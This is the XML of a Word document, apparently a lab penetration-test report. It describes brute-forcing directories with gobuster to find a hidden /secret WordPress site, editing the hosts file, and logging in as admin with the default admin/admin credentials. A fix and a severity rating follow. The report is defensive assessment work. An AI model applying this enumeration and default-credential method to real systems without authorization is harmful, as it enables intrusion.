        <w:t xml:space="preserve"> possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC6F1B" w14:textId="77777777" w:rsidR="000A72F0" w:rsidRDefault="000A72F0" w:rsidP="00122D38">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3616FF85" w14:textId="723F3E61" w:rsidR="000A72F0" w:rsidRDefault="000A72F0" w:rsidP="00122D38">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step-By-Step Instructions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D52FCDF" w14:textId="6DAEBAC1" w:rsidR="000A72F0" w:rsidRDefault="00A83E1A" w:rsidP="000A72F0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="003F2DA7" w:rsidRPr="00B54F97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.211</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003F2DA7">
        <w:t xml:space="preserve"> in your browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC460A" w14:textId="6964929B" w:rsidR="003F2DA7" w:rsidRDefault="003F2DA7" w:rsidP="000A72F0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From here we can run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002345F9">
        <w:t>directory names to see if this server is running any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA5B64" w14:textId="030B9354" w:rsidR="00250933" w:rsidRDefault="00250933" w:rsidP="000A72F0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B32E1" w14:textId="77777777" w:rsidR="00E213EB" w:rsidRDefault="00250933" w:rsidP="000A72F0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the following command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAD034A" w14:textId="29FE5A79" w:rsidR="00D167AE" w:rsidRDefault="0020265B" w:rsidP="00D167AE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobuster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-u 192.168.1.211/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74626D76" w14:textId="25EB5715" w:rsidR="00D167AE" w:rsidRDefault="00D167AE" w:rsidP="00D167AE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You will get the following result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB9D710" w14:textId="236E006A" w:rsidR="00D167AE" w:rsidRDefault="002B5C4D" w:rsidP="002B5C4D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RESULT </w:t>
      </w:r>
      <w:r w:rsidRPr="00A972CF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Status: 301) [Size: 315] [--&gt; http://192.168.1.211/secret/] /server-status (Status: 403) [Size: 278] Progress: 220560 / 220561 (100.00%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE62B2" w14:textId="5AE74660" w:rsidR="00A972CF" w:rsidRDefault="00A972CF" w:rsidP="00A972CF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can now see there is a directory named /secret, lets navigate to it by going to </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="000368F1" w:rsidRPr="00B54F97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.211/secret</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="446D958E" w14:textId="33E834E6" w:rsidR="00BE2034" w:rsidRDefault="00BE2034" w:rsidP="00A972CF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This hidden site just </w:t>
      </w:r>
      <w:r w:rsidR="00555729">
        <w:t>had a bunch of links that said they led to another blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE536A" w14:textId="1419011F" w:rsidR="00AA7627" w:rsidRDefault="00AA7627" w:rsidP="00A972CF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After finding this, I assumed there had to be a page for an admin to log in, so I researched some default login directory names and </w:t>
      </w:r>
      <w:r w:rsidR="00AC4CC1">
        <w:t>tried them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE7F0B6" w14:textId="45189896" w:rsidR="00AC4CC1" w:rsidRDefault="00AC4CC1" w:rsidP="00A972CF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ended up being the login page, so you can access it by navigating to </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00BE2034" w:rsidRPr="00B54F97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.211/secret/wp-login.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BE2034">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A8D426" w14:textId="5AD25963" w:rsidR="00555729" w:rsidRDefault="000368F1" w:rsidP="00555729">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00BE2034">
        <w:t>hen I tr</w:t>
      </w:r>
      <w:r w:rsidR="00555729">
        <w:t>ied to enter a username and password, I was redirected to a site that could not be found named http://vtcsec/secret</w:t>
      </w:r>
      <w:r w:rsidR="00BE2034">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00140DA8">
        <w:t xml:space="preserve">(the same happens when you click on any link from the original </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00140DA8" w:rsidRPr="00B54F97">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.1.211/secret</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00140DA8">
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC1A0A3" w14:textId="7B1ADD4D" w:rsidR="00AD02B7" w:rsidRDefault="00AD02B7" w:rsidP="00AD02B7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From here I guessed this </w:t>
      </w:r>
      <w:r w:rsidR="004C1C79">
        <w:t xml:space="preserve">hidden site </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">was hosted on a machine </w:t>
      </w:r>
      <w:r w:rsidR="004C1C79">
        <w:t xml:space="preserve">named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C1C79">
        <w:t>vtcsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00166F7E">
        <w:t>, so I decided to add that name to my host file and see if it made a change on the site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B945B8C" w14:textId="4E749F71" w:rsidR="00166F7E" w:rsidRDefault="00166F7E" w:rsidP="00166F7E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r w:rsidR="002B26A7">
        <w:t>the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B26A7">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B26A7">
        <w:t xml:space="preserve"> folder in your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B26A7">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B26A7">
        <w:t xml:space="preserve"> machine and type nano hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D1F6E7" w14:textId="00B7EB50" w:rsidR="002B26A7" w:rsidRDefault="002B26A7" w:rsidP="00166F7E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In that file add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vtcsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidR="007039F6">
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.169.1.211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49260991" w14:textId="0233A94D" w:rsidR="007039F6" w:rsidRDefault="00374124" w:rsidP="00166F7E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>I s</w:t>
      </w:r>
      <w:r w:rsidR="007039F6">
        <w:t>ave</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="007039F6">
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he changes to that file </w:t>
      </w:r>
      <w:r w:rsidR="007039F6">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>attempted to login on the login directory again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B7040" w14:textId="10152181" w:rsidR="00374124" w:rsidRDefault="00650D84" w:rsidP="00166F7E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>I decided to do some guess work and see if the default credentials were changed, after a few tries I used the username and password combination of admin/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E87BBCD" w14:textId="21077B4A" w:rsidR="00650D84" w:rsidRDefault="00650D84" w:rsidP="00166F7E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I was then directed to </w:t>
      </w:r>
      <w:r w:rsidR="0062761E">
        <w:t xml:space="preserve">a working blog site and sent to the admin </w:t>
      </w:r>
      <w:r w:rsidR="00243C71">
        <w:t xml:space="preserve">settings </w:t>
      </w:r>
      <w:r w:rsidR="0062761E">
        <w:t>page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377805D0" w14:textId="2DC5395F" w:rsidR="0062761E" w:rsidRPr="000A72F0" w:rsidRDefault="0062761E" w:rsidP="00166F7E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I now had access to the administrator page of the web server running. From here, I could edit the entire site, upload malicious files</w:t>
      </w:r>
      <w:r w:rsidR="00F76F73">
        <w:t>, redirect to a different malicious site, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034A0497" w14:textId="106451B1" w:rsidR="00F76F73" w:rsidRDefault="00122D38" w:rsidP="00F76F73">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FC621F" w:rsidRPr="00F76F73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Fix</w:t>
      </w:r>
      <w:r w:rsidR="00F76F73">
        <w:t xml:space="preserve">: If the site is not going to be launched or used, </w:t>
      </w:r>
      <w:r w:rsidR="0042172C">
        <w:t xml:space="preserve">remove the service so the site cannot be accessed. Otherwise, change the hidden directory name to something that cannot be easily brute forced/found. In addition to this, the </w:t>
      </w:r>
      <w:r w:rsidR="000B09A9">
        <w:t xml:space="preserve">admin credentials need to be changed from their default. Admin/admin is extremely common and usually one of the first </w:t>
      </w:r>
      <w:r w:rsidR="00881784">
        <w:t>combination a hacker will guess</w:t>
      </w:r>
      <w:r w:rsidR="0045640C">
        <w:t>; it is</w:t>
      </w:r>
      <w:r w:rsidR="00881784">
        <w:t xml:space="preserve"> also easily guessed by a brute force attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F62B9" w14:textId="77777777" w:rsidR="00881784" w:rsidRDefault="00881784" w:rsidP="00F76F73">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9E3" w14:textId="65975349" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="00881784">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidR="00881784">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00881784" w:rsidRPr="00881784">
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7378C990" w14:textId="77777777" w:rsidR="00881784" w:rsidRDefault="00881784" w:rsidP="00881784">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9E4" w14:textId="57BB19C7" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:spacing w:line="340" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="5780"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof Screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00881784">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2705C4BF" w14:textId="5EBCB31A" w:rsidR="002B6087" w:rsidRPr="002B6087" w:rsidRDefault="002B6087">
      <w:pPr>
        <w:spacing w:line="340" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="5780"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Adding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A5FC0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>vtcsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A5FC0">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to host file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48482B2F" w14:textId="0C3A65FA" w:rsidR="007C4D61" w:rsidRDefault="002B6087">
      <w:pPr>
        <w:spacing w:line="340" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="5780"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3766D424" wp14:editId="5BF9E42C">
            <wp:extent cx="5924550" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="6360612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127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8EA" w14:textId="77777777" w:rsidR="004A5FC0" w:rsidRDefault="004A5FC0">
      <w:pPr>
        <w:spacing w:line="340" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="5780"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD88785" w14:textId="43B83E34" w:rsidR="004A5FC0" w:rsidRPr="004A5FC0" w:rsidRDefault="004A5FC0" w:rsidP="00990616">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web Result After Adding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vtcsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to Host File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544119DA" w14:textId="7E3072ED" w:rsidR="00990616" w:rsidRDefault="00990616">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23B5E10A" wp14:editId="11B5FDDE">
            <wp:extent cx="5924550" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1732041620" name="Picture 1" descr="A potted plan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41620" name="Picture 1" descr="A potted plant on a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C65" w14:textId="77777777" w:rsidR="00990616" w:rsidRDefault="00990616">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559CC9FC" w14:textId="77777777" w:rsidR="008118CE" w:rsidRDefault="008118CE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A166BC" w14:textId="77777777" w:rsidR="008118CE" w:rsidRDefault="008118CE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D9EA987" w14:textId="77777777" w:rsidR="008118CE" w:rsidRDefault="008118CE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47AB657E" w14:textId="77777777" w:rsidR="008118CE" w:rsidRDefault="008118CE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5684E9B7" w14:textId="77777777" w:rsidR="008118CE" w:rsidRDefault="008118CE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57ACA3E7" w14:textId="77777777" w:rsidR="008118CE" w:rsidRDefault="008118CE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFB0566" w14:textId="77777777" w:rsidR="008118CE" w:rsidRDefault="008118CE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DBEE517" w14:textId="233494D3" w:rsidR="00990616" w:rsidRDefault="00B14637">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Admin Page Access After Guessing Username/Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7367792E" w14:textId="40B575F0" w:rsidR="00B14637" w:rsidRPr="00B14637" w:rsidRDefault="008118CE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C7A443E" wp14:editId="0BFC48E4">
            <wp:extent cx="5924550" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="105473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378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125" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:bookmarkStart w:id="23" w:name="_bookmark14"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="7E67261F" w14:textId="77777777" w:rsidR="00702ED8" w:rsidRDefault="00702ED8"/>
    <w:p w14:paraId="2C10222D" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="35D537A9" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="55CB7AD4" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="391B6BA8" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="0714E5EE" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="7E6E7CDC" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="275BD753" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="4CF630A9" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="1FF96882" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="130D54A2" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="6D362D27" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="09C3E07B" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="7BE6CD12" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="655A43E0" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="140C9F70" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="085FBEB2" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="5742CB88" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="2D7771D8" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="5F80EB16" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="584D625D" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="030834D5" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="57E503A0" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="43C24231" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="4F232BAD" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="6B4FBC54" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="1E787422" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="7EB0FF02" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="4BE1EDBA" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="3AB95549" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="56C305CA" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="35E1841A" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="61BED6F6" w14:textId="77777777" w:rsidR="00D35DFA" w:rsidRDefault="00D35DFA"/>
    <w:p w14:paraId="7A8BEA10" w14:textId="12BCF6DE" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9188"/>
        </w:tabs>
        <w:spacing w:before="71"/>
        <w:ind w:left="117"/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7A8BEA5B" wp14:editId="7A8BEA5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>899998</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>242722</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5760085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469A7" id="Graphic 16" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.85pt;margin-top:19.1pt;width:453.55pt;height:.1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" path="m,l5759996,e" filled="f" strokeweight=".14039mm">
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkStart w:id="24" w:name="_bookmark15"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r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7A8BEA63" wp14:editId="7A8BEA64">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>899998</wp:posOffset>
                </wp:positionH>
